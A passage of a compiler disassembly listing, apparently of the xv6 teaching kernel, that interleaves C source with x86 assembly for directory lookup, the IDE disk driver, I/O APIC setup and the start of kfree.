<dirlink+0x98> panic("dirlink read"); if(de.inum == 0) 80101e4a: 66 83 7d d8 00 cmpw $0x0,-0x28(%ebp) 80101e4f: 75 df jne 80101e30 <dirlink+0x30> break; } strncpy(de.name, name, DIRSIZ); 80101e51: 8d 45 da lea -0x26(%ebp),%eax 80101e54: 83 ec 04 sub $0x4,%esp 80101e57: 6a 0e push $0xe 80101e59: ff 75 0c pushl 0xc(%ebp) 80101e5c: 50 push %eax 80101e5d: e8 ce 29 00 00 call 80104830 <strncpy> de.inum = inum; 80101e62: 8b 45 10 mov 0x10(%ebp),%eax if(writei(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) 80101e65: 6a 10 push $0x10 80101e67: 57 push %edi 80101e68: 56 push %esi 80101e69: 53 push %ebx if(de.inum == 0) break; } strncpy(de.name, name, DIRSIZ); de.inum = inum; 80101e6a: 66 89 45 d8 mov %ax,-0x28(%ebp) if(writei(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) 80101e6e: e8 dd fb ff ff call 80101a50 <writei> 80101e73: 83 c4 20 add $0x20,%esp 80101e76: 83 f8 10 cmp $0x10,%eax 80101e79: 75 2a jne 80101ea5 <dirlink+0xa5> panic("dirlink"); return 0; 80101e7b: 31 c0 xor %eax,%eax } 80101e7d: 8d 65 f4 lea -0xc(%ebp),%esp 80101e80: 5b pop %ebx 80101e81: 5e pop %esi 80101e82: 5f pop %edi 80101e83: 5d pop %ebp 80101e84: c3 ret struct dirent de; struct inode *ip; // Check that name is not present. if((ip = dirlookup(dp, name, 0)) != 0){ iput(ip); 80101e85: 83 ec 0c sub $0xc,%esp 80101e88: 50 push %eax 80101e89: e8 12 f9 ff ff call 801017a0 <iput> return -1; 80101e8e: 83 c4 10 add $0x10,%esp 80101e91: b8 ff ff ff ff mov $0xffffffff,%eax 80101e96: eb e5 jmp 80101e7d <dirlink+0x7d> } // Look for an empty dirent. for(off = 0; off < dp->size; off += sizeof(de)){ if(readi(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) panic("dirlink read"); 80101e98: 83 ec 0c sub $0xc,%esp 80101e9b: 68 08 73 10 80 push $0x80107308 80101ea0: e8 cb e4 ff ff call 80100370 <panic> } strncpy(de.name, name, DIRSIZ); de.inum = inum; if(writei(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) panic("dirlink"); 80101ea5: 83 ec 0c sub $0xc,%esp 80101ea8: 68 02 7a 10 80 push $0x80107a02 80101ead: e8 be e4 ff ff call 80100370 <panic> 80101eb2: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80101eb9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80101ec0 <namei>: return ip; } struct inode* namei(char *path) { 80101ec0: 55 push %ebp char name[DIRSIZ]; return namex(path, 0, name); 80101ec1: 31 d2 xor %edx,%edx return ip; } struct inode* namei(char *path) { 80101ec3: 89 e5 mov %esp,%ebp 80101ec5: 83 ec 18 sub $0x18,%esp char name[DIRSIZ]; return namex(path, 0, name); 80101ec8: 8b 45 08 mov 0x8(%ebp),%eax 80101ecb: 8d 4d ea lea -0x16(%ebp),%ecx 80101ece: e8 7d fd ff ff call 80101c50 <namex> } 80101ed3: c9 leave 80101ed4: c3 ret 80101ed5: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80101ed9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80101ee0 <nameiparent>: struct inode* nameiparent(char *path, char *name) { 80101ee0: 55 push %ebp return namex(path, 1, name); 80101ee1: ba 01 00 00 00 mov $0x1,%edx return namex(path, 0, name); } struct inode* nameiparent(char *path, char *name) { 80101ee6: 89 e5 mov %esp,%ebp return namex(path, 1, name); 80101ee8: 8b 4d 0c mov 0xc(%ebp),%ecx 80101eeb: 8b 45 08 mov 0x8(%ebp),%eax } 80101eee: 5d pop %ebp } struct inode* nameiparent(char *path, char *name) { return namex(path, 1, name); 80101eef: e9 5c fd ff ff jmp 80101c50 <namex> 80101ef4: 66 90 xchg %ax,%ax 80101ef6: 66 90 xchg %ax,%ax 80101ef8: 66 90 xchg %ax,%ax 80101efa: 66 90 xchg %ax,%ax 80101efc: 66 90 xchg %ax,%ax 80101efe: 66 90 xchg %ax,%ax 80101f00 <idestart>: } // Start the request for b. Caller must hold idelock. static void idestart(struct buf *b) { 80101f00: 55 push %ebp if(b == 0) 80101f01: 85 c0 test %eax,%eax } // Start the request for b. Caller must hold idelock. static void idestart(struct buf *b) { 80101f03: 89 e5 mov %esp,%ebp 80101f05: 56 push %esi 80101f06: 53 push %ebx if(b == 0) 80101f07: 0f 84 ad 00 00 00 je 80101fba <idestart+0xba> panic("idestart"); if(b->blockno >= FSSIZE) 80101f0d: 8b 58 08 mov 0x8(%eax),%ebx 80101f10: 89 c1 mov %eax,%ecx 80101f12: 81 fb e7 03 00 00 cmp $0x3e7,%ebx 80101f18: 0f 87 8f 00 00 00 ja 80101fad <idestart+0xad> static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 80101f1e: ba f7 01 00 00 mov $0x1f7,%edx 80101f23: 90 nop 80101f24: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80101f28: ec in (%dx),%al static int idewait(int checkerr) { int r; while(((r = inb(0x1f7)) & (IDE_BSY|IDE_DRDY)) != IDE_DRDY) 80101f29: 83 e0 c0 and $0xffffffc0,%eax 80101f2c: 3c 40 cmp $0x40,%al 80101f2e: 75 f8 jne 80101f28 <idestart+0x28> } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80101f30: 31 f6 xor %esi,%esi 80101f32: ba f6 03 00 00 mov $0x3f6,%edx 80101f37: 89 f0 mov %esi,%eax 80101f39: ee out %al,(%dx) 80101f3a: ba f2 01 00 00 mov $0x1f2,%edx 80101f3f: b8 01 00 00 00 mov $0x1,%eax 80101f44: ee out %al,(%dx) 80101f45: ba f3 01 00 00 mov $0x1f3,%edx 80101f4a: 89 d8 mov %ebx,%eax 80101f4c: ee out %al,(%dx) 80101f4d: 89 d8 mov %ebx,%eax 80101f4f: ba f4 01 00 00 mov $0x1f4,%edx 80101f54: c1 f8 08 sar $0x8,%eax 80101f57: ee out %al,(%dx) 80101f58: ba f5 01 00 00 mov $0x1f5,%edx 80101f5d: 89 f0 mov %esi,%eax 80101f5f: ee out %al,(%dx) 80101f60: 0f b6 41 04 movzbl 0x4(%ecx),%eax 80101f64: ba f6 01 00 00 mov $0x1f6,%edx 80101f69: 83 e0 01 and $0x1,%eax 80101f6c: c1 e0 04 shl $0x4,%eax 80101f6f: 83 c8 e0 or $0xffffffe0,%eax 80101f72: ee out %al,(%dx) outb(0x1f2, sector_per_block); // number of sectors outb(0x1f3, sector & 0xff); outb(0x1f4, (sector >> 8) & 0xff); outb(0x1f5, (sector >> 16) & 0xff); outb(0x1f6, 0xe0 | ((b->dev&1)<<4) | ((sector>>24)&0x0f)); if(b->flags & B_DIRTY){ 80101f73: f6 01 04 testb $0x4,(%ecx) 80101f76: ba f7 01 00 00 mov $0x1f7,%edx 80101f7b: 75 13 jne 80101f90 <idestart+0x90> 80101f7d: b8 20 00 00 00 mov $0x20,%eax 80101f82: ee out %al,(%dx) outb(0x1f7, write_cmd); outsl(0x1f0, b->data, BSIZE/4); } else { outb(0x1f7, read_cmd); } } 80101f83: 8d 65 f8 lea -0x8(%ebp),%esp 80101f86: 5b pop %ebx 80101f87: 5e pop %esi 80101f88: 5d pop %ebp 80101f89: c3 ret 80101f8a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80101f90: b8 30 00 00 00 mov $0x30,%eax 80101f95: ee out %al,(%dx) } static inline void outsl(int port, const void *addr, int cnt) { asm volatile("cld; rep outsl" : 80101f96: ba f0 01 00 00 mov $0x1f0,%edx outb(0x1f4, (sector >> 8) & 0xff); outb(0x1f5, (sector >> 16) & 0xff); outb(0x1f6, 0xe0 | ((b->dev&1)<<4) | ((sector>>24)&0x0f)); if(b->flags & B_DIRTY){ outb(0x1f7, write_cmd); outsl(0x1f0, b->data, BSIZE/4); 80101f9b: 8d 71 5c lea 0x5c(%ecx),%esi 80101f9e: b9 80 00 00 00 mov $0x80,%ecx 80101fa3: fc cld 80101fa4: f3 6f rep outsl %ds:(%esi),(%dx) } else { outb(0x1f7, read_cmd); } } 80101fa6: 8d 65 f8 lea -0x8(%ebp),%esp 80101fa9: 5b pop %ebx 80101faa: 5e pop %esi 80101fab: 5d pop %ebp 80101fac: c3 ret idestart(struct buf *b) { if(b == 0) panic("idestart"); if(b->blockno >= FSSIZE) panic("incorrect blockno"); 80101fad: 83 ec 0c sub $0xc,%esp 80101fb0: 68 74 73 10 80 push $0x80107374 80101fb5: e8 b6 e3 ff ff call 80100370 <panic> // Start the request for b. Caller must hold idelock. static void idestart(struct buf *b) { if(b == 0) panic("idestart"); 80101fba: 83 ec 0c sub $0xc,%esp 80101fbd: 68 6b 73 10 80 push $0x8010736b 80101fc2: e8 a9 e3 ff ff call 80100370 <panic> 80101fc7: 89 f6 mov %esi,%esi 80101fc9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80101fd0 <ideinit>: return 0; } void ideinit(void) { 80101fd0: 55 push %ebp 80101fd1: 89 e5 mov %esp,%ebp 80101fd3: 83 ec 10 sub $0x10,%esp int i; initlock(&idelock, "ide"); 80101fd6: 68 86 73 10 80 push $0x80107386 80101fdb: 68 80 a5 10 80 push $0x8010a580 80101fe0: e8 3b 24 00 00 call 80104420 <initlock> ioapicenable(IRQ_IDE, ncpu - 1); 80101fe5: 58 pop %eax 80101fe6: a1 20 2d 11 80 mov 0x80112d20,%eax 80101feb: 5a pop %edx 80101fec: 83 e8 01 sub $0x1,%eax 80101fef: 50 push %eax 80101ff0: 6a 0e push $0xe 80101ff2: e8 a9 02 00 00 call 801022a0 <ioapicenable> 80101ff7: 83 c4 10 add $0x10,%esp static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 80101ffa: ba f7 01 00 00 mov $0x1f7,%edx 80101fff: 90 nop 80102000: ec in (%dx),%al static int idewait(int checkerr) { int r; while(((r = inb(0x1f7)) & (IDE_BSY|IDE_DRDY)) != IDE_DRDY) 80102001: 83 e0 c0 and $0xffffffc0,%eax 80102004: 3c 40 cmp $0x40,%al 80102006: 75 f8 jne 80102000 <ideinit+0x30> } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102008: ba f6 01 00 00 mov $0x1f6,%edx 8010200d: b8 f0 ff ff ff mov $0xfffffff0,%eax 80102012: ee out %al,(%dx) 80102013: b9 e8 03 00 00 mov $0x3e8,%ecx static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 80102018: ba f7 01 00 00 mov $0x1f7,%edx 8010201d: eb 06 jmp 80102025 <ideinit+0x55> 8010201f: 90 nop ioapicenable(IRQ_IDE, ncpu - 1); idewait(0); // Check if disk 1 is present outb(0x1f6, 0xe0 | (1<<4)); for(i=0; i<1000; i++){ 80102020: 83 e9 01 sub $0x1,%ecx 80102023: 74 0f je 80102034 <ideinit+0x64> 80102025: ec in (%dx),%al if(inb(0x1f7) != 0){ 80102026: 84 c0 test %al,%al 80102028: 74 f6 je 80102020 <ideinit+0x50> havedisk1 = 1; 8010202a: c7 05 60 a5 10 80 01 movl $0x1,0x8010a560 80102031: 00 00 00 } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102034: ba f6 01 00 00 mov $0x1f6,%edx 80102039: b8 e0 ff ff ff mov $0xffffffe0,%eax 8010203e: ee out %al,(%dx) } } // Switch back to disk 0. outb(0x1f6, 0xe0 | (0<<4)); } 8010203f: c9 leave 80102040: c3 ret 80102041: eb 0d jmp 80102050 <ideintr> 80102043: 90 nop 80102044: 90 nop 80102045: 90 nop 80102046: 90 nop 80102047: 90 nop 80102048: 90 nop 80102049: 90 nop 8010204a: 90 nop 8010204b: 90 nop 8010204c: 90 nop 8010204d: 90 nop 8010204e: 90 nop 8010204f: 90 nop 80102050 <ideintr>: } // Interrupt handler. void ideintr(void) { 80102050: 55 push %ebp 80102051: 89 e5 mov %esp,%ebp 80102053: 57 push %edi 80102054: 56 push %esi 80102055: 53 push %ebx 80102056: 83 ec 18 sub $0x18,%esp struct buf *b; // First queued buffer is the active request. acquire(&idelock); 80102059: 68 80 a5 10 80 push $0x8010a580 8010205e: e8 bd 24 00 00 call 80104520 <acquire> if((b = idequeue) == 0){ 80102063: 8b 1d 64 a5 10 80 mov 0x8010a564,%ebx 80102069: 83 c4 10 add $0x10,%esp 8010206c: 85 db test %ebx,%ebx 8010206e: 74 34 je 801020a4 <ideintr+0x54> release(&idelock); return; } idequeue = b->qnext; 80102070: 8b 43 58 mov 0x58(%ebx),%eax 80102073: a3 64 a5 10 80 mov %eax,0x8010a564 // Read data if needed. if(!(b->flags & B_DIRTY) && idewait(1) >= 0) 80102078: 8b 33 mov (%ebx),%esi 8010207a: f7 c6 04 00 00 00 test $0x4,%esi 80102080: 74 3e je 801020c0 <ideintr+0x70> insl(0x1f0, b->data, BSIZE/4); // Wake process waiting for this buf. b->flags |= B_VALID; b->flags &= ~B_DIRTY; 80102082: 83 e6 fb and $0xfffffffb,%esi wakeup(b); 80102085: 83 ec 0c sub $0xc,%esp if(!(b->flags & B_DIRTY) && idewait(1) >= 0) insl(0x1f0, b->data, BSIZE/4); // Wake process waiting for this buf. b->flags |= B_VALID; b->flags &= ~B_DIRTY; 80102088: 83 ce 02 or $0x2,%esi 8010208b: 89 33 mov %esi,(%ebx) wakeup(b); 8010208d: 53 push %ebx 8010208e: e8 4d 1e 00 00 call 80103ee0 <wakeup> // Start disk on next buf in queue. if(idequeue != 0) 80102093: a1 64 a5 10 80 mov 0x8010a564,%eax 80102098: 83 c4 10 add $0x10,%esp 8010209b: 85 c0 test %eax,%eax 8010209d: 74 05 je 801020a4 <ideintr+0x54> idestart(idequeue); 8010209f: e8 5c fe ff ff call 80101f00 <idestart> // First queued buffer is the active request. acquire(&idelock); if((b = idequeue) == 0){ release(&idelock); 801020a4: 83 ec 0c sub $0xc,%esp 801020a7: 68 80 a5 10 80 push $0x8010a580 801020ac: e8 8f 25 00 00 call 80104640 <release> // Start disk on next buf in queue. if(idequeue != 0) idestart(idequeue); release(&idelock); } 801020b1: 8d 65 f4 lea -0xc(%ebp),%esp 801020b4: 5b pop %ebx 801020b5: 5e pop %esi 801020b6: 5f pop %edi 801020b7: 5d pop %ebp 801020b8: c3 ret 801020b9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 801020c0: ba f7 01 00 00 mov $0x1f7,%edx 801020c5: 8d 76 00 lea 0x0(%esi),%esi 801020c8: ec in (%dx),%al static int idewait(int checkerr) { int r; while(((r = inb(0x1f7)) & (IDE_BSY|IDE_DRDY)) != IDE_DRDY) 801020c9: 89 c1 mov %eax,%ecx 801020cb: 83 e1 c0 and $0xffffffc0,%ecx 801020ce: 80 f9 40 cmp $0x40,%cl 801020d1: 75 f5 jne 801020c8 <ideintr+0x78> ; if(checkerr && (r & (IDE_DF|IDE_ERR)) != 0) 801020d3: a8 21 test $0x21,%al 801020d5: 75 ab jne 80102082 <ideintr+0x32> } idequeue = b->qnext; // Read data if needed. if(!(b->flags & B_DIRTY) && idewait(1) >= 0) insl(0x1f0, b->data, BSIZE/4); 801020d7: 8d 7b 5c lea 0x5c(%ebx),%edi } static inline void insl(int port, void *addr, int cnt) { asm volatile("cld; rep insl" : 801020da: b9 80 00 00 00 mov $0x80,%ecx 801020df: ba f0 01 00 00 mov $0x1f0,%edx 801020e4: fc cld 801020e5: f3 6d rep insl (%dx),%es:(%edi) 801020e7: 8b 33 mov (%ebx),%esi 801020e9: eb 97 jmp 80102082 <ideintr+0x32> 801020eb: 90 nop 801020ec: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 801020f0 <iderw>: // Sync buf with disk. // If B_DIRTY is set, write buf to disk, clear B_DIRTY, set B_VALID. // Else if B_VALID is not set, read buf from disk, set B_VALID. void iderw(struct buf *b) { 801020f0: 55 push %ebp 801020f1: 89 e5 mov %esp,%ebp 801020f3: 53 push %ebx 801020f4: 83 ec 10 sub $0x10,%esp 801020f7: 8b 5d 08 mov 0x8(%ebp),%ebx struct buf **pp; if(!holdingsleep(&b->lock)) 801020fa: 8d 43 0c lea 0xc(%ebx),%eax 801020fd: 50 push %eax 801020fe: e8 ed 22 00 00 call 801043f0 <holdingsleep> 80102103: 83 c4 10 add $0x10,%esp 80102106: 85 c0 test %eax,%eax 80102108: 0f 84 ad 00 00 00 je 801021bb <iderw+0xcb> panic("iderw: buf not locked"); if((b->flags & (B_VALID|B_DIRTY)) == B_VALID) 8010210e: 8b 03 mov (%ebx),%eax 80102110: 83 e0 06 and $0x6,%eax 80102113: 83 f8 02 cmp $0x2,%eax 80102116: 0f 84 b9 00 00 00 je 801021d5 <iderw+0xe5> panic("iderw: nothing to do"); if(b->dev != 0 && !havedisk1) 8010211c: 8b 53 04 mov 0x4(%ebx),%edx 8010211f: 85 d2 test %edx,%edx 80102121: 74 0d je 80102130 <iderw+0x40> 80102123: a1 60 a5 10 80 mov 0x8010a560,%eax 80102128: 85 c0 test %eax,%eax 8010212a: 0f 84 98 00 00 00 je 801021c8 <iderw+0xd8> panic("iderw: ide disk 1 not present"); acquire(&idelock); //DOC:acquire-lock 80102130: 83 ec 0c sub $0xc,%esp 80102133: 68 80 a5 10 80 push $0x8010a580 80102138: e8 e3 23 00 00 call 80104520 <acquire> // Append b to idequeue. b->qnext = 0; for(pp=&idequeue; *pp; pp=&(*pp)->qnext) //DOC:insert-queue 8010213d: 8b 15 64 a5 10 80 mov 0x8010a564,%edx 80102143: 83 c4 10 add $0x10,%esp panic("iderw: ide disk 1 not present"); acquire(&idelock); //DOC:acquire-lock // Append b to idequeue. b->qnext = 0; 80102146: c7 43 58 00 00 00 00 movl $0x0,0x58(%ebx) for(pp=&idequeue; *pp; pp=&(*pp)->qnext) //DOC:insert-queue 8010214d: 85 d2 test %edx,%edx 8010214f: 75 09 jne 8010215a <iderw+0x6a> 80102151: eb 58 jmp 801021ab <iderw+0xbb> 80102153: 90 nop 80102154: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80102158: 89 c2 mov %eax,%edx 8010215a: 8b 42 58 mov 0x58(%edx),%eax 8010215d: 85 c0 test %eax,%eax 8010215f: 75 f7 jne 80102158 <iderw+0x68> 80102161: 83 c2 58 add $0x58,%edx ; *pp = b; 80102164: 89 1a mov %ebx,(%edx) // Start disk if necessary. if(idequeue == b) 80102166: 3b 1d 64 a5 10 80 cmp 0x8010a564,%ebx 8010216c: 74 44 je 801021b2 <iderw+0xc2> idestart(b); // Wait for request to finish. while((b->flags & (B_VALID|B_DIRTY)) != B_VALID){ 8010216e: 8b 03 mov (%ebx),%eax 80102170: 83 e0 06 and $0x6,%eax 80102173: 83 f8 02 cmp $0x2,%eax 80102176: 74 23 je 8010219b <iderw+0xab> 80102178: 90 nop 80102179: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi sleep(b, &idelock); 80102180: 83 ec 08 sub $0x8,%esp 80102183: 68 80 a5 10 80 push $0x8010a580 80102188: 53 push %ebx 80102189: e8 a2 1b 00 00 call 80103d30 <sleep> // Start disk if necessary. if(idequeue == b) idestart(b); // Wait for request to finish. while((b->flags & (B_VALID|B_DIRTY)) != B_VALID){ 8010218e: 8b 03 mov (%ebx),%eax 80102190: 83 c4 10 add $0x10,%esp 80102193: 83 e0 06 and $0x6,%eax 80102196: 83 f8 02 cmp $0x2,%eax 80102199: 75 e5 jne 80102180 <iderw+0x90> sleep(b, &idelock); } release(&idelock); 8010219b: c7 45 08 80 a5 10 80 movl $0x8010a580,0x8(%ebp) } 801021a2: 8b 5d fc mov -0x4(%ebp),%ebx 801021a5: c9 leave while((b->flags & (B_VALID|B_DIRTY)) != B_VALID){ sleep(b, &idelock); } release(&idelock); 801021a6: e9 95 24 00 00 jmp 80104640 <release> acquire(&idelock); //DOC:acquire-lock // Append b to idequeue. b->qnext = 0; for(pp=&idequeue; *pp; pp=&(*pp)->qnext) //DOC:insert-queue 801021ab: ba 64 a5 10 80 mov $0x8010a564,%edx 801021b0: eb b2 jmp 80102164 <iderw+0x74> ; *pp = b; // Start disk if necessary. if(idequeue == b) idestart(b); 801021b2: 89 d8 mov %ebx,%eax 801021b4: e8 47 fd ff ff call 80101f00 <idestart> 801021b9: eb b3 jmp 8010216e <iderw+0x7e> iderw(struct buf *b) { struct buf **pp; if(!holdingsleep(&b->lock)) panic("iderw: buf not locked"); 801021bb: 83 ec 0c sub $0xc,%esp 801021be: 68 8a 73 10 80 push $0x8010738a 801021c3: e8 a8 e1 ff ff call 80100370 <panic> if((b->flags & (B_VALID|B_DIRTY)) == B_VALID) panic("iderw: nothing to do"); if(b->dev != 0 && !havedisk1) panic("iderw: ide disk 1 not present"); 801021c8: 83 ec 0c sub $0xc,%esp 801021cb: 68 b5 73 10 80 push $0x801073b5 801021d0: e8 9b e1 ff ff call 80100370 <panic> struct buf **pp; if(!holdingsleep(&b->lock)) panic("iderw: buf not locked"); if((b->flags & (B_VALID|B_DIRTY)) == B_VALID) panic("iderw: nothing to do"); 801021d5: 83 ec 0c sub $0xc,%esp 801021d8: 68 a0 73 10 80 push $0x801073a0 801021dd: e8 8e e1 ff ff call 80100370 <panic> 801021e2: 66 90 xchg %ax,%ax 801021e4: 66 90 xchg %ax,%ax 801021e6: 66 90 xchg %ax,%ax 801021e8: 66 90 xchg %ax,%ax 801021ea: 66 90 xchg %ax,%ax 801021ec: 66 90 xchg %ax,%ax 801021ee: 66 90 xchg %ax,%ax 801021f0 <ioapicinit>: ioapic->data = data; } void ioapicinit(void) { 801021f0: 55 push %ebp int i, id, maxintr; ioapic = (volatile struct ioapic*)IOAPIC; 801021f1: c7 05 54 26 11 80 00 movl $0xfec00000,0x80112654 801021f8: 00 c0 fe ioapic->data = data; } void ioapicinit(void) { 801021fb: 89 e5 mov %esp,%ebp 801021fd: 56 push %esi 801021fe: 53 push %ebx }; static uint ioapicread(int reg) { ioapic->reg = reg; 801021ff: c7 05 00 00 c0 fe 01 movl $0x1,0xfec00000 80102206: 00 00 00 return ioapic->data; 80102209: 8b 15 54 26 11 80 mov 0x80112654,%edx 8010220f: 8b 72 10 mov 0x10(%edx),%esi }; static uint ioapicread(int reg) { ioapic->reg = reg; 80102212: c7 02 00 00 00 00 movl $0x0,(%edx) return ioapic->data; 80102218: 8b 0d 54 26 11 80 mov 0x80112654,%ecx int i, id, maxintr; ioapic = (volatile struct ioapic*)IOAPIC; maxintr = (ioapicread(REG_VER) >> 16) & 0xFF; id = ioapicread(REG_ID) >> 24; if(id != ioapicid) 8010221e: 0f b6 15 80 27 11 80 movzbl 0x80112780,%edx ioapicinit(void) { int i, id, maxintr; ioapic = (volatile struct ioapic*)IOAPIC; maxintr = (ioapicread(REG_VER) >> 16) & 0xFF; 80102225: 89 f0 mov %esi,%eax 80102227: c1 e8 10 shr $0x10,%eax 8010222a: 0f b6 f0 movzbl %al,%esi static uint ioapicread(int reg) { ioapic->reg = reg; return ioapic->data; 8010222d: 8b 41 10 mov 0x10(%ecx),%eax int i, id, maxintr; ioapic = (volatile struct ioapic*)IOAPIC; maxintr = (ioapicread(REG_VER) >> 16) & 0xFF; id = ioapicread(REG_ID) >> 24; if(id != ioapicid) 80102230: c1 e8 18 shr $0x18,%eax 80102233: 39 d0 cmp %edx,%eax 80102235: 74 16 je 8010224d <ioapicinit+0x5d> cprintf("ioapicinit: id isn't equal to ioapicid; not a MP\n"); 80102237: 83 ec 0c sub $0xc,%esp 8010223a: 68 d4 73 10 80 push $0x801073d4 8010223f: e8 1c e4 ff ff call 80100660 <cprintf> 80102244: 8b 0d 54 26 11 80 mov 0x80112654,%ecx 8010224a: 83 c4 10 add $0x10,%esp 8010224d: 83 c6 21 add $0x21,%esi ioapic->data = data; } void ioapicinit(void) { 80102250: ba 10 00 00 00 mov $0x10,%edx 80102255: b8 20 00 00 00 mov $0x20,%eax 8010225a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi } static void ioapicwrite(int reg, uint data) { ioapic->reg = reg; 80102260: 89 11 mov %edx,(%ecx) ioapic->data = data; 80102262: 8b 0d 54 26 11 80 mov 0x80112654,%ecx cprintf("ioapicinit: id isn't equal to ioapicid; not a MP\n"); // Mark all interrupts edge-triggered, active high, disabled, // and not routed to any CPUs. for(i = 0; i <= maxintr; i++){ ioapicwrite(REG_TABLE+2*i, INT_DISABLED | (T_IRQ0 + i)); 80102268: 89 c3 mov %eax,%ebx 8010226a: 81 cb 00 00 01 00 or $0x10000,%ebx 80102270: 83 c0 01 add $0x1,%eax static void ioapicwrite(int reg, uint data) { ioapic->reg = reg; ioapic->data = data; 80102273: 89 59 10 mov %ebx,0x10(%ecx) 80102276: 8d 5a 01 lea 0x1(%edx),%ebx 80102279: 83 c2 02 add $0x2,%edx if(id != ioapicid) cprintf("ioapicinit: id isn't equal to ioapicid; not a MP\n"); // Mark all interrupts edge-triggered, active high, disabled, // and not routed to any CPUs. for(i = 0; i <= maxintr; i++){ 8010227c: 39 f0 cmp %esi,%eax } static void ioapicwrite(int reg, uint data) { ioapic->reg = reg; 8010227e: 89 19 mov %ebx,(%ecx) ioapic->data = data; 80102280: 8b 0d 54 26 11 80 mov 0x80112654,%ecx 80102286: c7 41 10 00 00 00 00 movl $0x0,0x10(%ecx) if(id != ioapicid) cprintf("ioapicinit: id isn't equal to ioapicid; not a MP\n"); // Mark all interrupts edge-triggered, active high, disabled, // and not routed to any CPUs. for(i = 0; i <= maxintr; i++){ 8010228d: 75 d1 jne 80102260 <ioapicinit+0x70> ioapicwrite(REG_TABLE+2*i, INT_DISABLED | (T_IRQ0 + i)); ioapicwrite(REG_TABLE+2*i+1, 0); } } 8010228f: 8d 65 f8 lea -0x8(%ebp),%esp 80102292: 5b pop %ebx 80102293: 5e pop %esi 80102294: 5d pop %ebp 80102295: c3 ret 80102296: 8d 76 00 lea 0x0(%esi),%esi 80102299: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801022a0 <ioapicenable>: void ioapicenable(int irq, int cpunum) { 801022a0: 55 push %ebp } static void ioapicwrite(int reg, uint data) { ioapic->reg = reg; 801022a1: 8b 0d 54 26 11 80 mov 0x80112654,%ecx } } void ioapicenable(int irq, int cpunum) { 801022a7: 89 e5 mov %esp,%ebp 801022a9: 8b 45 08 mov 0x8(%ebp),%eax // Mark interrupt edge-triggered, active high, // enabled, and routed to the given cpunum, // which happens to be that cpu's APIC ID. ioapicwrite(REG_TABLE+2*irq, T_IRQ0 + irq); 801022ac: 8d 50 20 lea 0x20(%eax),%edx 801022af: 8d 44 00 10 lea 0x10(%eax,%eax,1),%eax } static void ioapicwrite(int reg, uint data) { ioapic->reg = reg; 801022b3: 89 01 mov %eax,(%ecx) ioapic->data = data; 801022b5: 8b 0d 54 26 11 80 mov 0x80112654,%ecx } static void ioapicwrite(int reg, uint data) { ioapic->reg = reg; 801022bb: 83 c0 01 add $0x1,%eax ioapic->data = data; 801022be: 89 51 10 mov %edx,0x10(%ecx) { // Mark interrupt edge-triggered, active high, // enabled, and routed to the given cpunum, // which happens to be that cpu's APIC ID. ioapicwrite(REG_TABLE+2*irq, T_IRQ0 + irq); ioapicwrite(REG_TABLE+2*irq+1, cpunum << 24); 801022c1: 8b 55 0c mov 0xc(%ebp),%edx } static void ioapicwrite(int reg, uint data) { ioapic->reg = reg; 801022c4: 89 01 mov %eax,(%ecx) ioapic->data = data; 801022c6: a1 54 26 11 80 mov 0x80112654,%eax { // Mark interrupt edge-triggered, active high, // enabled, and routed to the given cpunum, // which happens to be that cpu's APIC ID. ioapicwrite(REG_TABLE+2*irq, T_IRQ0 + irq); ioapicwrite(REG_TABLE+2*irq+1, cpunum << 24); 801022cb: c1 e2 18 shl $0x18,%edx static void ioapicwrite(int reg, uint data) { ioapic->reg = reg; ioapic->data = data; 801022ce: 89 50 10 mov %edx,0x10(%eax) // Mark interrupt edge-triggered, active high, // enabled, and routed to the given cpunum, // which happens to be that cpu's APIC ID. ioapicwrite(REG_TABLE+2*irq, T_IRQ0 + irq); ioapicwrite(REG_TABLE+2*irq+1, cpunum << 24); } 801022d1: 5d pop %ebp 801022d2: c3 ret 801022d3: 66 90 xchg %ax,%ax 801022d5: 66 90 xchg %ax,%ax 801022d7: 66 90 xchg %ax,%ax 801022d9: 66 90 xchg %ax,%ax 801022db: 66 90 xchg %ax,%ax 801022dd: 66 90 xchg %ax,%ax 801022df: 90 nop 801022e0 <kfree>: // which normally should have been returned by a // call to kalloc(). (The exception is when // initializing the allocator; see kinit above.) void kfree(char *v) { 801022e0: 55 push %ebp 801022e1: 89 e5 mov %esp,%ebp 801022e3: 53 push %ebx 801022e4: 83 ec 04 sub $0x4,%esp 801022e7: 8b 5d 08 mov 0x8(%ebp),%ebx struct run *r; if((uint)v % PGSIZE || v < end || V2P(v) >= PHYSTOP) 801022ea: f7 c3 ff 0f 00 00 test $0xfff,%ebx 801022f0: 75 70 jne 80102362 <kfree+0x82> 801022f2: 81 fb b4 64 11 80 cmp $0x801164b4,%ebx 801022f8: 72 68 jb 80102362 <kfree+0x82> 801022fa: 8d 83 00 00 00 80 lea -0x80000000(%ebx),%eax 80102300: 3d ff ff ff 0d cmp $0xdffffff,%eax 80102305: 77 5b ja 80102362 <kfree+0x82> panic("kfree"); // Fill with junk to 